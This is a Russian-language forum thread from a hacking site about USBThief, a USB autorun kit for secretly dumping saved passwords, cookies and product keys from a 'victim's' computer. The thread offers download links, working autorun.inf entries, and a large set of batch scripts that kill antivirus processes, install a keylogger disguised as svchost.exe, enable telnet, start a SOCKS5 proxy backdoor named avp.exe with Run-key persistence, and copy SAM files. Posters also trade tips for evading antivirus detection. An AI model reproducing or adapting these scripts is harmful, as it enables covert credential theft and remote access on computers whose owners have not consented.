PDA

Просмотр полной версии : USBThief: копируем пароли жертвы, путем вставки USB носителя.


vanpeld
06.03.2008, 21:58
http://ipicture.ru/uploads/080306/DI34Gu7TGW.jpg

USBThief- это уникальная программа. Она умеет копирует (или красть, как кому удобно) пароли с любых PC, включая пароли лицензий! :) Программа проверена на работоспособность, работает отлично!

Итак, для установки нам потребуется USB наситель и данная програмка.
Распакуйте архив, и из папки USBThief скопируете всё на флэшку.
(Важно!!! Вы ДОЛЖНЫ скопировать все файлы в главную дирикторию USB насителя! Никаких папок создавать не надо!)

Как работает:
Вставьте USB в компьютер Вашей жертвы
В папке "dump" на USB вы увидите все пароли :)


Размер файла: 1.17 MB

Depositfiles
Скачать USBThief (http://depositfiles.com/ru/files/3968040)

iFolder
Скачать USBThief (http://ifolder.ru/5632103)

.W
06.03.2008, 22:06
Кто-то пробовал? Реально так?

Conquerstador
06.03.2008, 23:38
Проверил! Все пашет на ура, автор молодец! +

iddqd
06.03.2008, 23:40
Автозапуск чтоли?
А если он отключен?

Conquerstador
06.03.2008, 23:47
а как ты его отключишь???
просто флешку суй и через минуты высунь и все вот что содержит autorun.inf

[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

не знаю кто придумал идею но со одной стороны очень банальная а с другой очень интересная!!!

iddqd
06.03.2008, 23:49
И антивирус молчит?
проактивная защита Каспера должна орать...

Conquerstador
06.03.2008, 23:50
И антивирус молчит?
проактивная защита Каспера должна орать...

так я про то же что банальную вещь не палит но тут нет отправки как пинч придется ждать когда друг сходит в туалет а потом вставить флеху :)

Conquerstador
07.03.2008, 00:00
Вот результаты вирус тотал, заметьте наши супер антивиры не палят как касперский, НОД и веб!!!

http://i009.radikal.ru/0803/b6/34c50400d499.jpg

Kusto
07.03.2008, 00:31
ну жди- через пару дней начнут палить- сколько раз можно говорить что сбросив на вирустотал- все равно что отошлете файл на касперский лаб

LEE_ROY
07.03.2008, 01:12
какая разница, касперы вэбы ноды тоже гуглить умеют и читают разные сайты и собирают свои сигнатурки. вирустотал непричем здесь.

Conquerstador
07.03.2008, 17:37
ну жди- через пару дней начнут палить- сколько раз можно говорить что сбросив на вирустотал- все равно что отошлете файл на касперский лаб

ты что думаешь что из-за какого-то пользователя в ачате я уже про россию молчу что 3/4 пользователи интернета, касперский начнет палить ну ты даешь конечно у них кроме этого туфтового вирус тотал есть своя лаборатория и накрутасы всякие, так что от одного пользователя это не зависит!!! :)

ReVOLVeR
07.03.2008, 23:07
Неплохая прога... интересны мктоды реализации....

KillAll
13.03.2008, 17:06
Я только не пойму почему антивирем проверяли nircmd.exe, ведь это только ехе-шник для запуска прог из директории batexe.
Естественно не будет палиться, потому что там ничего злого нету, ведь все "полезные" функции выполняет не nircmd.exe.
Пхожая статейка уже была, только в этой подборке больше прог, половина из которых под SP2 не пашет, но интересные проги есть. Взял некоторые на вооружение.

Реализовал через батник, только теперь по новым прогам нужно будет читать маны.

ReVOLVeR
13.03.2008, 19:46
впринципе можно сделать собственную сборку по такому типу используя только нужный тебе софт
...

EST a1ien
13.03.2008, 20:13
а как ты его отключишь???
просто флешку суй и через минуты высунь и все вот что содержит autorun.inf

У меня через твикеры отключен автозапуск со всех носителей.
И мне суй не суй флешку с этой прогой без разнице.

iddqd
13.03.2008, 21:05
У меня через твикеры отключен автозапуск со всех носителей.
И мне суй не суй флешку с этой прогой без разнице.
Правильнее сказать- "через реестр", ибо почти все, что делает твикер- делается в реестре.
И вообще этим штукам не следует доверять- непонятно, что они там еще делают- я предпочитаю все вручную

EST a1ien
13.03.2008, 21:29
Я знаю что можно в ручную но просто в падлу лесть в регедит и искать ключик(а до этого искать где эта опция в нем находится). Просто тупо лень :)

MegaZLO
14.04.2008, 10:33
нод32 гадко палит, хотя и инифицирует всего лишь как авторан вирус.

http://ipicture.ru/uploads/080414/8AO3zToUdT.jpg

Glynec
19.04.2008, 10:45
Автору +.Былобы непрохо еслибы исходники выложил.

n0153r
21.04.2008, 00:54
Автору +.Былобы непрохо еслибы исходники выложил.
Исходники какой проги ?
Там проде и так понятно как все реализованно.

n0153r
22.04.2008, 10:01
нод32 гадко палит, хотя и инифицирует всего лишь как авторан вирус.

http://ipicture.ru/uploads/080414/8AO3zToUdT.jpg
Просто переделай автозагрузку.Немного изменить файлик autorun.ini и сборка не палитса. :cool:

Fisch_ka
22.04.2008, 14:02
Если запретить автозагрузку ...зайти через Мой компьютер и открыть флешку...то USBThief все равно сделает свое черное дело??

symbioin
22.04.2008, 22:39
USBThief portable antichat.ru edition

мне понравилась програмка. решыл улутшыть ее. незнаю автора, хотел бы отблагодарить за неё :) ета версия ето тот случай когда некуда скидивать на флешку или прочее. просто когда нужна моментально узнать всю инфу. в разработке щас новая версия в которой вводишь мыло. потом при експортировании данных файли аплоадятся на фтп. и отправляются на указаное мыло. и еще будет добавлена убийца антивирусов. на 2 секунды (а именно столько и нужна для получения инфы) будут остановлятся антивирусы а потом назад возобновятся.

ета версия одна бинарка которую мона скинуть на свое мыло :)


ссылки :

zip 1.99mb

http://rapidshare.com/files/109589469/USBthief.zip.html
http://depositfiles.com/ru/files/4906500
http://www.filefactory.com/file/6afc01/

exe 2.14mb

http://rapidshare.com/files/109589331/USBthief.exe.html
http://depositfiles.com/ru/files/4906525
http://www.filefactory.com/file/38a6b5/

KemSucks
02.05.2008, 19:11
а без мыло можно что бы сразу на флэш ВСЮ инфу ?

zlo12
03.05.2008, 18:11
А на плеер если закачать, работать будет?

Karantin
12.05.2008, 19:33
А на плеер если закачать, работать будет?
А почему нет? Плеер это, по сути таже флэшка. Хоть на телефон с USB кабелем.

rude
22.05.2008, 23:14
USBThief portable antichat.ru edition

мне понравилась програмка. решыл улутшыть ее. незнаю автора, хотел бы отблагодарить за неё :) ета версия ето тот случай когда некуда скидивать на флешку или прочее. просто когда нужна моментально узнать всю инфу. в разработке щас новая версия в которой вводишь мыло. потом при експортировании данных файли аплоадятся на фтп. и отправляются на указаное мыло. и еще будет добавлена убийца антивирусов. на 2 секунды (а именно столько и нужна для получения инфы) будут остановлятся антивирусы а потом назад возобновятся.

ета версия одна бинарка которую мона скинуть на свое мыло :)


ссылки :

zip 1.99mb

http://rapidshare.com/files/109589469/USBthief.zip.html
http://depositfiles.com/ru/files/4906500
http://www.filefactory.com/file/6afc01/

exe 2.14mb

http://rapidshare.com/files/109589331/USBthief.exe.html
http://depositfiles.com/ru/files/4906525
http://www.filefactory.com/file/38a6b5/

Скажите пожалуста, вот я её скачал ,установил на флешку, воткнул в ком , запустил авторун.Мне открылась папка dump в которой я так понимаю находятся нужные мне данные. И почему то половина их пустая, т.е нет никаких паролей и тому подобное ( Imclients, mail, Pst password, IEpassword, NetworkPassword ) !!! Может я что то не то делаю, или нетуда смотрю ???

Krinicin
29.05.2008, 17:27
У меня тоже самое , помогите понять пожалуйста!

Ct-Ct
01.06.2008, 03:12
Sacma

Karantin
01.06.2008, 16:09
Скажите пожалуста, вот я её скачал ,установил на флешку, воткнул в ком , запустил авторун.Мне открылась папка dump в которой я так понимаю находятся нужные мне данные. И почему то половина их пустая, т.е нет никаких паролей и тому подобное ( Imclients, mail, Pst password, IEpassword, NetworkPassword ) !!! Может я что то не то делаю, или нетуда смотрю ???
Либо там нет сохраненных паролей, либо свежие версии софта , и, возможно, usb thief их не распознаёт.

willisbadi
14.06.2008, 16:14
И антивирус молчит?
проактивная защита Каспера должна орать...

1SeTh
15.06.2008, 00:52
мне интересно а как же защититься от нее? простой блок авторана помогает? если да то советую пользоватся USB disk security.
Еще такой вопрос можно все таки бросить exe файлы в папку, а авторане указать туда путь тому кому я собираюсь подсунуть флеху который далеко ужь не ламер.)))

1SeTh
28.06.2008, 09:30
вот мой авторан если в случае автоплей не запустится и юзер не запустить флешку двойным шелчком. Тогда при помощи shell\название в контекстном меню\ мы добавим опции такие как open или explore. Соответсвенно это для english XP

[autorun]
UseAutoPlay=1
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat
shell\open\Command=nircmd.exe execmd CALL batexe\progstart.bat
shell\open\Default=1
shell\explore\Command=nircmd.exe execmd CALL batexe\progstart.bat

еще если есть подозрении на прог запускаемые в batexe то можете все сами скачать отсюда >> nirsoft.net заодно и обновить их

1SeTh
04.07.2008, 11:58
кто нить знает почему когда я добавляю эти строчки в обе бат файлов? в следствие чего возникает ошибка и не выполняется команда

nircmd.exe execmd .\batexe\dialupass2.exe /shtml
"dump\~$sys.computername$\dialup.html"

antares
11.07.2008, 14:42
а если порт юзбы закрыт программой-локером на низком уровне? у меня юзба открыта только на моей тачке, у юзеров все залокено и с флэхами все ходят ко мне...

1SeTh
17.07.2008, 22:33
незнаю почему, но на многих компах просто не хочет дампировать. От чего это?

A2GIL
17.07.2008, 23:10
незнаю почему, но на многих компах просто не хочет дампировать. От чего это?

Ну возможно на компах этих ничего и нету! Да и вообще его уже антивири все обнаруживают, да откровенно говоря, подборка софта там для "вспоминания пароля" просто отстой!

1SeTh
18.07.2008, 02:45
неужели даже хистории нету?)))
да вообще антивири не палять, если с оффсайта загрузить,
хорошая идея с подбором этих софтов.

AcidSlayer
22.07.2008, 02:05
да +1) Нужно будет попробовать. Только не могу понять, Пароли от чего?! Или от всего возможного ИЗВЕСНОГО софта?!

echobyte
23.07.2008, 10:35
да +1) Нужно будет попробовать. Только не могу понять, Пароли от чего?! Или от всего возможного ИЗВЕСНОГО софта?!

Startup Programs List
Visited Links List
Internet Explorer Passwords List
Instant Messengers Accounts List
Installed Windows Updates List
Email Accounts List
Cookies List
Adapters Report
Network Passwords List
TCP/UDP Ports List
Product Key List
PST Passwords List
Protected Storage Passwords List

dd_
29.07.2008, 17:50
А автор программы известен?
Есть офф страничка у этой програмки?

Defrion
06.08.2008, 20:51
Эхх... Палиццо.
Есть ли у проги офф сайт?

SeverKrukivo
07.08.2008, 23:30
Люди, а есть вариант чтоб она копировала не пассы, а папку "хистори" от квипа ? xD

xaker-boss
08.08.2008, 01:10
Прога супер, Касперский с последними обновлениями Не палит.

Pernat1y
20.08.2008, 12:48
вот разные сборки с описаниями

http://wiki.hak5.org/wiki/USB_Switchblade
и
http://wiki.hak5.org/wiki/Switchblade_Packages

.AkeLLa
31.08.2008, 20:09
Можно же и самому такое сделать, создать bat который будет копировать файлы с паролями и т.д. нужных прог (а у большенства юзеров они установлены в стандартный каталог - C:\Program Files\) и прописать его запуск в autorun.inf в корне флешки.. ;)
Кстати подскажите кто знает где в реестре храниться этот автозапуск.. Как его отключить?
Тоесть сделать что бы autorun.inf система совсем игнорировала.

KillAll
05.09.2008, 12:04
to .AkeLLa
Кстати подскажите кто знает где в реестре храниться этот автозапуск.. Как его отключить?
Тоесть сделать что бы autorun.inf система совсем игнорировала.

http://forum.antichat.ru/showthread.php?p=849233&posted=1#post849233

SKiMN
05.09.2008, 16:00
Прога шикарная чтобы не палилась нада её упаковать и всё !

NightHost
08.09.2008, 13:27
Задумка супер)))
Пробывал седня качать... У самого стоит Нод 3.0.650.0 базы - 3424(20080907)
И что, сразу же видем ругань на архив:

08.09.2008 12:23:39 Фильтр HTTP файл http://stg690.ifolder.ru/download/?5632103&WMEQ+gZJO8jJSQM0nk44cQ== INF/Autorun вирус соединение прервано - изолирован ..... Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Mozilla Firefox\firefox.exe.

Anderson55
08.09.2008, 14:24
автору спасибо-качаем))

immortal16
16.09.2008, 23:51
кто подскажет как такую фичу сделать тока чтоб кукисы со всех браузеров искала и кидала в папку на флэшке !т.е. втыкнул и достал а кукисы уже у тебя!как ето реализовать !?кто подскажет!?и тоже самое тока чтоб не на флэшку а на мыло или фтп какойниб!?желательно чтоб все действия не логирвались!заранее пасиб!

lilsaint
17.09.2008, 21:34
не знаю все зделал по инструкции, но нифига не работает на 3-ех компах пробывал(((

Fooog
22.09.2008, 18:00
А можно чтоб вместе с прогой во флешке были разные файлы и папки???

1SeTh
22.09.2008, 18:09
А можно чтоб вместе с прогой во флешке были разные файлы и папки???

что ты имеешь ввиду? название фолдера поменять?

dd_
23.09.2008, 08:38
А можно чтоб вместе с прогой во флешке были разные файлы и папки???

Можно, сколько угодно.

loman8е
06.10.2008, 14:41
народ а есть чтонибудь по новей этой проги...??
а то она у меня на компе только 2 пароля нашла и на других тоже самое!!

cyk10id
04.11.2008, 10:15
можно немного модифицировать USBThief. я сделал это так.Для начала изменяем файл progstart.bat

@echo off
rem ========Запуск основных програм для сбора паролей
rem nircmd.exe execmd CALL batexe\go.bat
rem ========Запуск и копирование клавиатурного шпиона
rem nircmd.exe execmd CALL batexe\spook.bat
rem ========Запуск и копирование боунсера(создание туннеля.прокси)
nircmd.exe execmd CALL batexe\bouncer.bat
rem ========Копирование базы SAM и т.д.
rem nircmd.exe execmd CALL batexe\copy.bat
rem ========просмотр портов,истории браузера,процессов,версии обновлений и т.д.
rem nircmd.exe execmd CALL batexe\infodump.bat
================================================== ======
добавив в папку batexe несколько файлов сценария и программ.
==============сценарии:
==========go.bat
@echo off
tskill avp.exe
nircmd.exe execmd CALL batexe\moddump.bat
nircmd.exe execmd CALL batexe\modsmax.bat
nircmd.exe killprocess avp.exe
==========spook.bat
@echo off
nircmd.exe execmd copy "batexe\update\svchost.exe" "~$sys.temp$"
nircmd.exe execmd copy "batexe\update\pshook64.dll" "~$sys.temp$"
nircmd.exe execmd mkdir "~$sys.temp$\Data"
nircmd.exe execmd copy "batexe\update\pshook.dll" "~$sys.temp$"
nircmd.exe execmd copy "batexe\update\Data" "~$sys.temp$\Data\"
nircmd.exe cmdwait 20000 execmd copy "batexe\update\diary.dll" "~$sys.temp$"
nircmd.exe cmdwait 30000 execmd CALL ~$sys.temp$\svchost.exe
nircmd.exe service auto telnet
nircmd.exe service start tlntsvr
===========bouncer.bat
@echo off
nircmd.exe execmd copy "batexe\avp.bat" "~$sys.temp$"
nircmd.exe execmd copy "batexe\avp.exe" "~$sys.temp$"
nircmd.exe execmd copy "batexe\avploader.exe" "~$sys.temp$"
nircmd.exe execmd CALL ~$sys.temp$\avp.exe --socks5 --port 7070 --s_user cyk10id --s_password 777 --daemon
nircmd.exe execmd CALL batexe\modsmax.bat
reg add "hklm\software\Microsoft\Windows\CurrentVersion\Run" /v AVP Updater /t REG_SZ /d "C:\Temp\AVP.BAT" /f
nircmd.exe execmd mkdir "dump\~$sys.computername$"
nircmd.exe execmd .\batexe\awatch.exe /shtml "dump\~$sys.computername$\NetworkAdapter.html"
===========copy.bat
@echo off
nircmd.exe execmd copy "~$sys.temp$\diary.dll" "Dump\~$sys.computername$\"
nircmd.exe execmd mkdir "Dump\~$sys.computername$\system\"
nircmd.exe execmd copy "~$folder.windows$\repair" "Dump\~$sys.computername$\system\"
nircmd.exe execmd copy "~$folder.system$\drivers\etc" "Dump\~$sys.computername$\system\"
nircmd.exe monitor off
===========infodump.bat
@ echo off
nircmd.exe execmd .\batexe\cports.exe /shtml "dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd .\batexe\wul.exe /shtml "dump\~$sys.computername$\InstalledUpdates.html"
nircmd.exe execmd .\batexe\strun.exe /shtml "dump\~$sys.computername$\Startup.html"
nircmd.exe execmd .\batexe\servimin.exe /shtml "dump\~$sys.computername$\Services.html"
nircmd.exe execmd .\batexe\CProcess.exe /shtml "dump\~$sys.computername$\CProcess.html"
nircmd.exe execmd .\batexe\iehv.exe /shtml "dump\~$sys.computername$\history.html"
nircmd.exe execmd .\batexe\ProduKey.exe /shtml "dump\~$sys.computername$\ProductKey.html"
===========avp.bat
@echo off
nircmd.exe execmd avp.exe --socks5 --port 7070 --daemon
================================================== =======
создаем эти сценарии и приступим к софту
bouncer (для открытия прокси на компе) переименовываем на avp.exe для маскировки в процессах.копируем в batexe nircmd.exe и переименовываем его на AVPUpdater.exe
так же поступаем с Punto Svitcher"ом переименовывая его в svchost.exe(установи Punto Svitcher(PS) и тупо скопируй все файлы с его директории на batexe/update + изменённый PS )в настройках PS укажи неотображатся в трее. и нужно отключить автотранслит.прога лицензионная антивирусами не палится. Как это работает разберёшся из bat файла.
убирая и добавляя комментарии(rem) в сценарий progstart.bat можно заточить флешку на определенного юзверя.

cyk10id
04.11.2008, 10:16
PS. если понравилоь, щелкните +

Dzhonik
05.11.2008, 01:04
А как насчёт боунесера, самого ексешника, он ведь всеми антивирями палится!!!

s0ul
07.11.2008, 19:06
жаль что уже он палится

kOs-
08.11.2008, 12:55
Помогите сделать, или подскажите , если уже есть,
Прога работает ,супер, но мне нужно от этой проги только паролина mail.ru и dual-up.
поскажите где скачать.

:{-VaigeR-}:
13.11.2008, 00:53
Помогите сделать, или подскажите , если уже есть,
Прога работает ,супер, но мне нужно от этой проги только паролина mail.ru и dual-up.
поскажите где скачать.

Кого скачать то?? Пароли от маила и диалап или кого?))

h4ck3r
13.11.2008, 01:56
Кого скачать то?? Пароли от маила и диалап или кого?))

Начни читать тему с первой страницы, а не с последнего поста... может дойдет о чем речь идет.

Feonor
14.11.2008, 00:51
Аваст палит жестока

kyoko
15.11.2008, 23:29
классная прога, зачод однозначно! только б еще каких нибудь паролей туда добавить

UnDRaux
15.11.2008, 23:53
Да прога палится большинством АнтиВирусов... мб даже всеми... уже неактуальна она :(

kyoko
18.11.2008, 03:10
в универе д.веб стоит, седня поверяли флэшку вставляли - не палит.

npizpak
09.01.2009, 11:12
а пароль виндовса 2000 вытянет????? обычный пароль пользователя я на информатике хо поиздевацо)

BODOK
30.03.2009, 00:24
Палится уже - всё не актуал

CbIcTeMn1k
04.04.2009, 17:42
На висте вылезает окошко для выполнения действий над флешкой, если кликать открыть папку для просмотра авторан не задействован, а вот если через авторан, приходитс кликать на Open Files On Folder...

DCRM
15.05.2009, 16:18
Палится уже - всё не актуал
Возможно... но всётаки, если принять во внимание, что на большинстве компов, многие не удосуживаются обновлять базы, например в школах, универах, клубах(и такие есть)... то можно этим долго ещё пользоваться :)
собственно вот сборка, с самовосстановлением)

/** By DCRM
* USB_Theif on 15.05.2009
* Special for script kiddie's ^_^
** We dumping other password ;) */
Additional:

SelfRepair
Auto/Manual Run
Hidden files
666 attribute >:)

Modules:

OpenPorts
IE_History
IE_Pwd
FF_History
FF_Pwd
Mail_Pwd
MS_Pwd
Net_Pwd
Product_Key
ProtectStorage_Pwd
Win_Network

Instructions

UnZIP archive in root flash
Run rerar.cmd
Have Fun ;)
If AVP damage files go to 2
If Virus damage autorun.inf and you need run USB_Theif -> start manualy repair.cmd -> go to 2


>>DownLoad<< (http://letitbit.net/download/3903bcc693/usbtheif.zip.html)
md5:4b2f4ee40514fe3b9104d027a57d0061

fox4k
02.06.2009, 04:05
Почему то не кто не вспомнил про Multi Password Recovery ее также можно залить на флешу и тырить пасы, функцыонал схож с пинчем, не чем не палица, но есть 1 большой "-" перед USBThief ее нужно ручками запускать, и сохранять фаил с паролями, это занимает буквально сек 5... пока чел отвернется))), давно пользую кста, вот линк на последнюю версию Multi Password Recovery 1.1.4 + Portable http://depositfiles.com/files/3c6x6jrwl или http://depositfiles.com/files/aiif544tp кряк присутствует! 1 вопрос только можно ли ее довести до ума что бы она проделывала скан и сохраняла фаил с паролями автоматически при включении флеши?..

dd_
03.06.2009, 09:41
Почему то не кто не вспомнил про Multi Password Recovery ее также можно залить на флешу и тырить пасы, функцыонал схож с пинчем, не чем не палица, но есть 1 большой "-" перед USBThief ее нужно ручками запускать, и сохранять фаил с паролями, это занимает буквально сек 5... пока чел отвернется))), давно пользую кста, вот линк на последнюю версию Multi Password Recovery 1.1.4 + Portable http://depositfiles.com/files/3c6x6jrwl или http://depositfiles.com/files/aiif544tp кряк присутствует! 1 вопрос только можно ли ее довести до ума что бы она проделывала скан и сохраняла фаил с паролями автоматически при включении флеши?..

mpr палится и причем давно

shketik
18.07.2009, 16:42
Штука отличная!!!!!! СпС автору работает на ура!!!

lesja
19.07.2009, 15:19
не могу скачать NOD блокирует (((

echobyte
19.07.2009, 16:33
не могу скачать NOD блокирует (((
http://i015.radikal.ru/0907/da/7184799d4604t.jpg (http://radikal.ru/F/i015.radikal.ru/0907/da/7184799d4604.jpg.html)

aloneBSK
21.07.2009, 22:38
ды ребят все просто до безобразия)если вы будете тыркать флеху знакомому в комп,када он будет тужица на унитазе,можно просто выключить антивир))))и все проблемы)и спасибо автору,ща буду проверять на своем компе

Велемир
31.07.2009, 21:26
UnZIP archive in root flash
Run rerar.cmd

Тупо залил на телефон,потом подрубил его к компу через юсб.И нифига...телефон ведь тоже считается носителем.Разумеется,предв арительно я эти шаги выполнял на телефоне).

DCRM
01.08.2009, 15:31
UnZIP archive in root flash
Run rerar.cmd

Тупо залил на телефон,потом подрубил его к компу через юсб.И нифига...телефон ведь тоже считается носителем.Разумеется,предв арительно я эти шаги выполнял на телефоне).

Если что то не получается, выполни 5й пункт) Запусти сам процесс дампа, repair.cmd и всё гуд, такое бывает, когда автозапуск отключен

Велемир
02.08.2009, 16:24
Пасип,попробую.Может,и прокатит

diehard
02.08.2009, 17:11
Возможно... но всётаки, если принять во внимание, что на большинстве компов, многие не удосуживаются обновлять базы, например в школах, универах, клубах(и такие есть)... то можно этим долго ещё пользоваться :)

да! вот только что там красть в школах, универах, клубах :)

Visor
03.08.2009, 00:26
Антивирусы видят уже закриптованный файл или реагируют на сам факт подозрительного автозапуска?

RayMy
21.08.2009, 01:09
Вот (http://ifolder.ru/13646112) по моему мнению лучший Switchblade-пак.
Копируем все на флешку,на компе жертвы автораним или запускаем или запускаем файл scan.После всех действий,то что удалось выудить находится в switchblade\dump\ .

Schtirliz
27.08.2009, 20:59
Каспер молчит реально. С помощью USBGuard он определил как вирус

inspektor
17.09.2009, 02:50
у меня NOD 32 не молчит!

-=chelovek=-
19.09.2009, 12:28
Блин!. Ну как я понял Эта фигня работаете через авозапуск. :) Отключил я его, и что дальше? Она идт лесом? :)

banana
02.11.2009, 13:48
Avira Antivir. Обновляется каждый день. Молчит, но все же не сработало

p.r0phe.t
18.11.2009, 07:49
На семёрке папка dump осталась пуста. Есть что-нить под это платформу?

B0o0M
18.11.2009, 22:57
USBThief portable antichat.ru edition

мне понравилась програмка. решыл улутшыть ее. незнаю автора, хотел бы отблагодарить за неё :) ета версия ето тот случай когда некуда скидивать на флешку или прочее. просто когда нужна моментально узнать всю инфу. в разработке щас новая версия в которой вводишь мыло. потом при експортировании данных файли аплоадятся на фтп. и отправляются на указаное мыло. и еще будет добавлена убийца антивирусов. на 2 секунды (а именно столько и нужна для получения инфы) будут остановлятся антивирусы а потом назад возобновятся.

ета версия одна бинарка которую мона скинуть на свое мыло :)


ссылки :

zip 1.99mb

http://rapidshare.com/files/109589469/USBthief.zip.html
http://depositfiles.com/ru/files/4906500
http://www.filefactory.com/file/6afc01/

exe 2.14mb

http://rapidshare.com/files/109589331/USBthief.exe.html
http://depositfiles.com/ru/files/4906525
http://www.filefactory.com/file/38a6b5/

можеш выложить исходники и как ты очтанавливал антивирусы ????

cheater_man
04.12.2009, 16:18
Вот например беспалевный авторан

[autorun]
icon=Setup.ico
open=Autorun.exe
Ну а что запускать это дело вашего мозга :D

silichester
08.12.2009, 21:04
На семёрке папка dump осталась пуста. Есть что-нить под это платформу?

та же проблема(

cheater_man
08.12.2009, 21:18
На семёрке папка dump осталась пуста. Есть что-нить под это платформу?

та же проблема(
ты бы еще сказал воткнул в комп с линухой :) А ПАПКА ПУСТА :confused: :D

Самовар
20.12.2009, 15:14
Прога отличная. Только надо подстраивать под себя.
Мне лично нах не нужно чтоб историю она копировала или инфо о сетевухе.
Я оставил только:
пароли dialup
пароли firefox
пароли chrome
пароли Ie.
Кто может помочь с паролями на оперу???
Отпишите пжлста.
P.S. Каспер вирусы не палит, но видит нечто шаманское на флешке.
P.P.S. Теперь, после небольших изменений каспером не палится у меня.

[extas-y]
11.01.2010, 17:14
мне не оч как то.

calbo
20.01.2010, 23:34
Народ а что надо написать в БАТ файле что бы батник тырил допустим только *.txt файы? Ну и опять таки что бы работало через автозагрузку и не выскакивало никаких окошек)))) ????

imir08
05.02.2010, 11:58
есть прога filerat называеца ссылку выкладывать не буду в гугле найдёшь

LHP
03.03.2010, 14:27
может есть чё нить похожее на семерку?

SiriysBlack
04.03.2010, 21:32
уже неактуально и старо..хотя прога класная)

IceFlame
06.03.2010, 21:46
Надо будет опробывать

Ferriszak312
26.03.2010, 03:30
спасибо. работает

Ferriszak312
27.03.2010, 08:24
Но все равно палит не антивирус
а сама винда, выдает что вирус

dead_luminor
07.04.2010, 17:06
норм, понадобиться)

diablone
27.05.2010, 13:18
насчет неактуально я бы поспорил. на семерку мало кто перешел. в основном практически все пользуются сборками win xp. к этой проге mpr прицепить можно?

ZolotoY
27.05.2010, 16:27
Скажите а пароли вконтакте и одноклассников тоже тырит?

grddos
30.05.2010, 22:51
нод палит как автозагрузочный вирус inf/autorun virus

<Cyber-punk>
30.05.2010, 23:14
Много лет уже пользуюсь. Всё хорошо, только работает не стабильно.

grddos
30.05.2010, 23:37
Много лет уже пользуюсь. Всё хорошо, только работает не стабильно.
Много лет это сколько? У лузеров толкового ничего не натыришь, а обновленные антивирусы уже палят.

ZolotoY
31.05.2010, 17:08
а обновление прогаммы не планируется?

<Cyber-punk>
31.05.2010, 17:50
Много лет это сколько? У лузеров толкового ничего не натыришь, а обновленные антивирусы уже палят.

Года 2 уже пользуюсь. Антивирусы пока не палили.

Respekt335
13.06.2010, 17:24
такой вопросс как сделать что б моя прога запускалась автоматически? она наподобе этой токо куки тырит а вот атоматически не могу настроить вечно жмакать на неё нужно-(( объясните подробно плз...

ZolotoY
13.06.2010, 23:52
Скажите а пароли вконтакте и одноклассников тоже тырит?
???